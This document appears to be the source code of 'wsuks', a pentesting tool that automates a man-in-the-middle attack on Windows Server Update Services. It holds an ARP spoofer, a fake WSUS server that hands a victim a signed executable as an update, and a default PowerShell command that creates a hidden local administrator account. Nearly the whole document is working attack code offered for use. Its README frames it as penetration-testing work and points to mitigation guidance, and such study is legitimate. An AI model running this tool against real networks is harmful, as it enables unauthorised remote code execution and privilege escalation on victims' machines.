#!/usr/bin/env python3

from http.server import BaseHTTPRequestHandler
import logging
import traceback
from bs4 import BeautifulSoup
from random import randint
import uuid
import html
import datetime
import base64
import hashlib
import sys
import os
import wsuks


class WSUSUpdateHandler:
    def __init__(self, executable_file, executable_name, client_address):
        self.logger = logging.getLogger("wsuks")

        self.get_config_xml = ''
        self.get_cookie_xml = ''
        self.register_computer_xml = ''
        self.sync_updates_xml = ''
        self.get_extended_update_info_xml = ''
        self.report_event_batch_xml = ''
        self.get_authorization_cookie_xml = ''

        self.revision_ids = [randint(900000, 999999), randint(900000, 999999)]
        self.deployment_ids = [randint(80000, 99999), randint(80000, 99999)]
        self.uuids = [uuid.uuid4(), uuid.uuid4()]

        self.executable = executable_file
        self.executable_name = executable_name
        self.command = ''
        self.sha1 = ''
        self.sha256 = ''

        self.client_address = client_address

        self.set_filedigest()

    def get_last_change(self):
        return (datetime.datetime.now() - datetime.timedelta(days=3)).isoformat()

    def get_cookie(self):
        return base64.b64encode(b'A'*47).decode('utf-8')

    def get_expire(self):
        return (datetime.datetime.now() + datetime.timedelta(minutes=10)).isoformat()

    def set_resources_xml(self, command):
        self.command = command
        # init resources

        path = os.path.abspath(os.path.dirname(wsuks.__file__))

        try:
            with open(f'{path}/xml_files/get-config.xml', 'r') as file:
                self.get_config_xml = file.read().format(lastChange=self.get_last_change())
                file.close()

            with open(f'{path}/xml_files/get-cookie.xml', 'r') as file:
                self.get_cookie_xml = file.read().format(expire=self.get_expire(), cookie=self.get_cookie())
                file.close()

            with open(f'{path}/xml_files/register-computer.xml', 'r') as file:
                self.register_computer_xml = file.read()
                file.close()

            with open(f'{path}/xml_files/sync-updates.xml', 'r') as file:
                # TODO KB1234567 -> dynamic
                self.sync_updates_xml = file.read().format(revision_id1=self.revision_ids[0],
                                                           revision_id2=self.revision_ids[1],
                                                           deployment_id1=self.deployment_ids[0],
                                                           deployment_id2=self.deployment_ids[1],
                                                           uuid1=self.uuids[0],
                                                           uuid2=self.uuids[1],
                                                           expire=self.get_expire(),
                                                           cookie=self.get_cookie())
                file.close()

            with open(f'{path}/xml_files/get-extended-update-info.xml', 'r') as file:
                self.get_extended_update_info_xml = file.read().format(revision_id1=self.revision_ids[0],
                                                                       revision_id2=self.revision_ids[1],
                                                                       sha1=self.sha1,
                                                                       sha256=self.sha256,
                                                                       filename=self.executable_name,
                                                                       file_size=len(self.executable),
                                                                       command=html.escape(html.escape(self.command)),
                                                                       url=f'http://{self.client_address}/{uuid.uuid4()}/{self.executable_name}')
                file.close()

            with open(f'{path}/xml_files/report-event-batch.xml', 'r') as file:
                self.report_event_batch_xml = file.read()
                file.close()

            with open(f'{path}/xml_files/get-authorization-cookie.xml', 'r') as file:
                self.get_authorization_cookie_xml = file.read().format(cookie=self.get_cookie())
                file.close()

        except Exception as err:
            self.logger.error(f'Error: {err}')
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
            sys.exit(1)

    def set_filedigest(self):
        hash1 = hashlib.sha1()
        hash256 = hashlib.sha256()
        try:
            data = self.executable
            hash1.update(data)
            hash256.update(data)
            self.sha1 = base64.b64encode(hash1.digest()).decode()
            self.sha256 = base64.b64encode(hash256.digest()).decode()

        except Exception as err:
            self.logger.error(f'Error in set_filedigest: {err}')
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
            sys.exit(1)

    def __str__(self):
        return f'The update metadata - uuids: {self.uuids}, revision_ids: {self.revision_ids}, deployment_ids: {self.deployment_ids}, executable: {self.executable_name}, sha1: {self.sha1}, sha256: {self.sha256}, command: {self.command}'


class WSUSBaseServer(BaseHTTPRequestHandler):
    def __init__(self, wsusUpdateHandler):
        self.logger = logging.getLogger("wsuks")
        self.wsusUpdateHandler = wsusUpdateHandler

    def _set_response(self, serveEXE=False):

        self.protocol_version = 'HTTP/1.1'
        self.send_response(200)
        # self.server_version = 'Microsoft-IIS/10.0'
        # self.send_header('Accept-Ranges', 'bytes')
        self.send_header('Cache-Control', 'private')

        if serveEXE:
            self.send_header('Content-Type', 'application/octet-stream')
            self.send_header("Content-Length", len(self.wsusUpdateHandler.executable))
        else:
            self.send_header('Content-type', 'text/xml; chartset=utf-8')

        self.send_header('X-AspNet-Version', '4.0.30319')
        self.send_header('X-Powered-By', 'ASP.NET')
        self.end_headers()

    def do_HEAD(self):
        self.logger.debug(f'HEAD request,\nPath: {self.path}\nHeaders:\n{self.headers}\n')

        if self.path.find(".exe"):
            self.logger.info(f"Requested: {self.path}")

            self._set_response(True)

    def do_GET(self):
        self.logger.debug(f'GET request,\nPath: {self.path}\nHeaders:\n{self.headers}\n')

        if self.path.find(".exe"):
            self.logger.info(f"Requested: {self.path}")

            self._set_response(True)
            self.wfile.write(self.wsusUpdateHandler.executable)

    def do_POST(self):

        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)

        post_data_xml = BeautifulSoup(post_data, "xml")
        data = None

        self.logger.debug(f"POST Request,\nPath: {self.path}\nHeaders:\n{self.headers}\n\nBody:\n{post_data_xml.encode_contents()}\n")

        soap_action = self.headers['SOAPAction']

        if soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetConfig"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/b76899b4-ad55-427d-a748-2ecf0829412b
            data = BeautifulSoup(self.wsusUpdateHandler.get_config_xml, 'xml')

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/36a5d99a-a3ca-439d-bcc5-7325ff6b91e2
            data = BeautifulSoup(self.wsusUpdateHandler.get_cookie_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/RegisterComputer"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/b0f2a41f-4b96-42a5-b84f-351396293033
            data = BeautifulSoup(self.wsusUpdateHandler.register_computer_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/6b654980-ae63-4b0d-9fae-2abb516af894
            data = BeautifulSoup(self.wsusUpdateHandler.sync_updates_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetExtendedUpdateInfo"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/862adc30-a9be-4ef7-954c-13934d8c1c77
            data = BeautifulSoup(self.wsusUpdateHandler.get_extended_update_info_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/ReportEventBatch"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/da9f0561-1e57-4886-ad05-57696ec26a78
            data = BeautifulSoup(self.wsusUpdateHandler.report_event_batch_xml, "xml")

            post_data_report = BeautifulSoup(post_data, "xml")
            self.logger.info(f'Client Report: {post_data_report.TargetID.text}, {post_data_report.ComputerBrand.text}, {post_data_report.ComputerModel.text}, {post_data_report.ExtendedData.ReplacementStrings.string}.')

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/44767c55-1e41-4589-aa01-b306e0134744
            data = BeautifulSoup(self.wsusUpdateHandler.get_authorization_cookie_xml, "xml")

        else:
            self.logger.warning("SOAP Action not handled")
            self.logger.info(f'SOAP Action: {soap_action}')
            return

        self._set_response()
        self.wfile.write(data.encode_contents())

        self.logger.info(f'SOAP Action: {soap_action}')

        if data is not None:
            self.logger.debug(f"POST Response,\nPath: {self.path}\nHeaders:\n{self.headers}\n\nBody:\n{data.encode_contents}\n")
        else:
            self.logger.warning("POST Response without data.")



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
from argparse import RawTextHelpFormatter
import importlib.metadata
import wsuks
from os.path import dirname

__version__ = importlib.metadata.version('wsuks')


def printBanner():
    print(f"""
    __          __ _____  _    _  _  __  _____ 
    \ \        / // ____|| |  | || |/ / / ____|
     \ \  /\  / /| (___  | |  | || ' / | (___  
      \ \/  \/ /  \___ \ | |  | ||  <   \___ \ 
       \  /\  /   ____) || |__| || . \  ____) |
        \/  \/   |_____/  \____/ |_|\_\|_____/ 
                                                                                        
     Pentesting Tool for the WSUS MITM Attack
               Made by NeffIsBack
                 Version: {__version__}
""")


def initParser():
    example_text = """Examples:
    wsuks -t 192.168.0.10 --WSUS-Server 192.168.0.2
    wsuks -t 192.168.0.10 -u User -p Password123 -dc-ip 192.168.0.1
    """
    parser = argparse.ArgumentParser(prog='wsuks', epilog=example_text, formatter_class=RawTextHelpFormatter)

    parser.add_argument('-v', '--version', action='version', version='Current Version: %(prog)s 2.0')
    parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output')

    parser.add_argument('-t', '--target-ip', metavar='', dest='targetIp', help='IP Address of the victim Client. (REQUIRED)', required=True)
    parser.add_argument('-I', '--interface', metavar='', help='Network Interface to use. (DEFAULT: %(default)s)', default='eth0')
    parser.add_argument('-e', '--executable', metavar='', default=f'{dirname(wsuks.__file__)}/executables/PsExec64.exe',type=argparse.FileType('rb'), help='The executable to returned to the victim. It has to be signed by Microsoft (DEFAULT: %(default)s)')
    parser.add_argument('-c', '--command', metavar='', help='The command to execute on the victim. (DEFAULT: %(default)s)', default='/accepteula /s powershell.exe \'New-LocalUser -Name "WSUKS_USER" -Password $(ConvertTo-SecureString "WSUKS_PASSWORD" -AsPlainText -Force) -Fullname "wsuks user" -Description "This user was generated by the wsuks Tool"; Add-LocalGroupMember -Group $(Get-LocalGroup -SID S-1-5-32-544 | Select Name) -Member "WSUKS_USER"\'')

    simple = parser.add_argument_group('AUTOMATIC MODE', 'Discover the WSUS Server automatically by searching for GPOs in SYSVOL. (Default)')
    simple.add_argument('-u', '--username', metavar='', help='Username to authenticate with. (Required in automatic Mode)')
    simple.add_argument('-p', '--password', metavar='', help='Password to authenticate with. (Required in automatic Mode)')
    simple.add_argument('-dc-ip', metavar='', dest='dcIp', help='IP Address of the domain controller. (Required in automatic Mode)')
    simple.add_argument('--domain', metavar='', help='Domain to authenticate with. (Optional)')

    advanced = parser.add_argument_group('MANUAL MODE', 'If you know the WSUS Server, you can use this mode to skip the automatic discovery.')
    advanced.add_argument('--WSUS-Server', metavar='', dest='wsusIp', help='IP Address of the WSUS Server.')
    advanced.add_argument('--WSUS-Port', metavar='', dest='wsusPort', type=int, default=8530, help='Port of the WSUS Server. (DEFAULT: %(default)s)')

    return parser.parse_args()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from http.server import HTTPServer
import logging
import os
from pprint import pformat
import random
from string import digits, ascii_letters
from scapy.all import get_if_addr, sniff
from wsuks.helpers.arpspoofer import ArpSpoofer
from wsuks.helpers.logger import initLogger
from wsuks.helpers.argparser import initParser, printBanner
from wsuks.helpers.sysvolparser import SysvolParser
from wsuks.helpers.wsusserver import WSUSUpdateHandler, WSUSBaseServer
from termcolor import colored


class Wsuks:
    def __init__(self, args):
        self.logger = logging.getLogger("wsuks")
        self.hostIp = get_if_addr(args.interface)
        self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
        self.local_password = "".join(random.sample(ascii_letters, 16))

        # Set args
        self.targetIp = args.targetIp  # Never None (required)
        self.executable_file = args.executable.read()
        self.executable_name = os.path.basename(args.executable.name)
        args.executable.close()
        self.command = args.command.replace("WSUKS_USER", self.local_username).replace("WSUKS_PASSWORD", self.local_password)

        self.wsusIp = args.wsusIp
        self.wsusPort = args.wsusPort  # Default 8530
        self.domain_username = args.username
        self.domain_password = args.password
        self.domain = args.domain
        self.dcIp = args.dcIp

    def run(self):
        # Get the WSUS server IP and Port from the sysvol share
        sysvolparser = SysvolParser()
        if not self.wsusIp:
            self.logger.info("WSUS Server not specified, trying to find it in SYSVOL share on DC")
            self.wsusIp, self.wsusPort = sysvolparser.findWsusServer(self.domain, self.domain_username, self.domain_password, self.dcIp)
        else:
            self.logger.info(f"WSUS Server specified manually: {self.wsusIp}:{self.wsusPort}")

        # Start Arp Spoofing
        arpspoofer = ArpSpoofer()
        arpspoofer.start(self.targetIp, self.wsusIp)

        # Prepare WSUS Update Handler
        # sniff(filter="tcp and port 8530", prn=self.handlePacket, store=0)
        update_handler = WSUSUpdateHandler(self.executable_file, self.executable_name, f'{self.hostIp}:{self.wsusPort}')
        update_handler.set_resources_xml(self.command)

        self.logger.debug(update_handler)

        # Prepare WSUS HTTP Server
        wsusBaseServer = WSUSBaseServer(update_handler)
        http_server = HTTPServer((self.hostIp, self.wsusPort), wsusBaseServer)
        self.logger.success(f"Generated Credentials for the WSUS attack: Username={colored(self.local_username, 'green', attrs=['bold'])} Password={colored(self.local_password, 'green', attrs=['bold'])}")
        try:
            self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")
            http_server.serve_forever()
        except KeyboardInterrupt:
            print("")
            self.logger.info("Stopping WSUS Server...")
        finally:
            arpspoofer.stop()

    def handlePacket(self, packet):
        packet.show()


def main():
    # Setup
    printBanner()
    args = initParser()

    logger = initLogger(debug=args.debug)
    logger.debug('Passed args:\n' + pformat(vars(args)))

    # Prevent scapy from logging to console
    scapyLogger = logging.getLogger('scapy')
    scapyLogger.handlers.clear()

    if os.geteuid() != 0:
        logger.error("This script must be run as root!")
        exit(1)

    wsuks = Wsuks(args)
    wsuks.run()


if __name__ == '__main__':
    main()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import logging
import sys
import time
import traceback
import scapy.all as scapy
from threading import Thread


class ArpSpoofer:
    """
    This class is used to enable MITM attacks with ARP spoofing.
    """

    def __init__(self):
        self.logger = logging.getLogger("wsuks")
        self.isRunning = False
        self.targetIp = None
        self.spoofIp = None

    def _spoof(self, targetIp, spoofIp):
        """
        Spoof the target's ARP table by sending a fake ARP response with our MAC address as the sender.
        
        :param targetIp: The victim's IP address
        :param spoofIp: The IP address to spoof
        """
        targetMac = scapy.getmacbyip(targetIp)
        self.logger.debug(f"Target IP address: {targetIp}")
        self.logger.debug(f"Target MAC address: {targetMac}")
        if targetMac == None:
            self.logger.error(f"ARP request for IP address {targetIp} failed! Target is not reachable!")
            sys.exit(1)
        else:
            while self.isRunning:
                self.logger.debug(f"Tell target {targetIp} that spoofed IP address {spoofIp} is at our MAC address")
                packet = scapy.ARP(op=2, pdst=targetIp, hwdst=targetMac, psrc=(spoofIp))
                scapy.send(packet, verbose=False)
                time.sleep(1)

    def _restore(self, targetIp, source_ip):
        """
        Restore the target's ARP table by sending a real ARP response.
        This is done by sending the target the spoofed IP address and the real MAC address of the spoofed IP address.

        :param targetIp: The victim's IP address
        :param source_ip: The spoofed IP address
        """
        try:
            self.logger.info(f"Restoring ARP tables for target {targetIp} and spoofed IP address {source_ip}")
            self.logger.debug(f"Tell target {targetIp} the correct MAC-Adress for spoofed IP address {source_ip}")
            destination_mac = scapy.getmacbyip(targetIp)
            source_mac = scapy.getmacbyip(source_ip)
            packet = scapy.ARP(op=2, pdst=targetIp, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
            scapy.send(packet, verbose=False)
        except Exception as e:
            self.logger.error(f"Error while restoring ARP tables: {e}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()

    def start(self, targetIp, spoofIp):
        """
        Start the ARP spoofing process.

        :param targetIp: The victim's IP address
        :param spoofIp: The IP address to spoof
        """
        self.targetIp = targetIp
        self.spoofIp = spoofIp
        self.isRunning = True

        self.logger.info(f"Starting ARP spoofing for target {targetIp} and spoofing IP address {spoofIp}")
        t1 = Thread(target=self._spoof, args=(targetIp, spoofIp))
        t1.start()
        
    def stop(self):
        """
        Stop the ARP spoofing process.
        """
        if self.isRunning and self.targetIp and self.spoofIp:
            self.logger.info(f"Stopping ARP spoofing for target {self.targetIp}")
            self.isRunning = False
            self._restore(self.targetIp, self.spoofIp)
        else:
            self.logger.error("ARP spoofing is not running")





# -*- coding: utf-8 -*-
from setuptools import setup

packages = \
['wsuks', 'wsuks.helpers']

package_data = \
{'': ['*'], 'wsuks': ['executables/*', 'xml_files/*']}

install_requires = \
['bs4>=0.0.1,<0.0.2',
 'impacket>=0.10.0,<0.11.0',
 'scapy>=2.5.0,<3.0.0',
 'termcolor>=2.2.0,<3.0.0']

entry_points = \
{'console_scripts': ['wsuks = wsuks.wsuks:main']}

setup_kwargs = {
    'name': 'wsuks',
    'version': '0.3.0',
    'description': 'A Tool for automating the MITM attack on the WSUS connection',
    'long_description': '![Supported Python versions](https://img.shields.io/badge/python-3.10+-blue.svg) [![Twitter](https://img.shields.io/twitter/follow/al3x_n3ff?label=al3x_n3ff&style=social)](https://twitter.com/intent/follow?screen_name=al3x_n3ff)\n# wsuks\n_Weaponizing the WSUS Attack_\n\nGaining local administrative access on a Windows machine that is part of a domain is typically the initial step towards acquiring domain admin privileges during a penetration test. In order to exploit the WSUS attack automatically, this tool spoofs the IP address of the WSUS server within the network using ARP, and when the client requests Windows updates, it provides its own malicious updates instead.\nBy default, a Windows client requests updates every 24 hours. \n\nBoth the executable file served (Default: PsExec64.exe) and the executed command can be changed as needed.\n\nPrerequisits:\n- The target Client must be on the local network\n- The Windows Server Update Service (WSUS) must be configured using HTTP\n\nResult:\n- After successful execution a user with the format user[0-9]{5} (e.g. user12345) and a random password will be created and added to the local admin group\n\n## Installation\nUsing pipx:\n```\nsudo apt install python3-pipx\npipx ensurepath\npipx install wsuks\nsudo ln -s ~/.local/pipx/venvs/wsuks/bin/wsuks /usr/local/bin/wsuks\n```\n\nUsing poetry:\n```\nsudo apt install python3-poetry\ngit clone https://github.com/NeffIsBack/wsuks\ncd wsuks\nsudo poetry install\n```\n\n## Usage\n❗wsuks must be run as root❗\n\nWith pipx:\n```\nsudo wsuks\nsuso wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20\n```\n\nWith poetry:\n```\nsudo poetry run wsuks\nsudo poetry run wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20\n```\n\n## About & Mitigation\nIn the [PyWSUS](https://github.com/GoSecure/pywsus) Repository from GoSecure you can find a great documentation how to you could detect and mitigate this attack.\nThey also wrote a great Guide demonstrating how this attack works in detail [here](https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/).\n\nThis Tool is based on the following projects:\n- https://github.com/GoSecure/pywsus\n- https://github.com/GoSecure/wsuspect-proxy\n\n',
    'author': 'Alexander Neff',
    'author_email': 'alex99.neff@gmx.de',
    'maintainer': 'None',
    'maintainer_email': 'None',
    'url': 'None',
    'packages': packages,
    'package_data': package_data,
    'install_requires': install_requires,
    'entry_points': entry_points,
    'python_requires': '>=3.10,<4.0',
}


setup(**setup_kwargs)
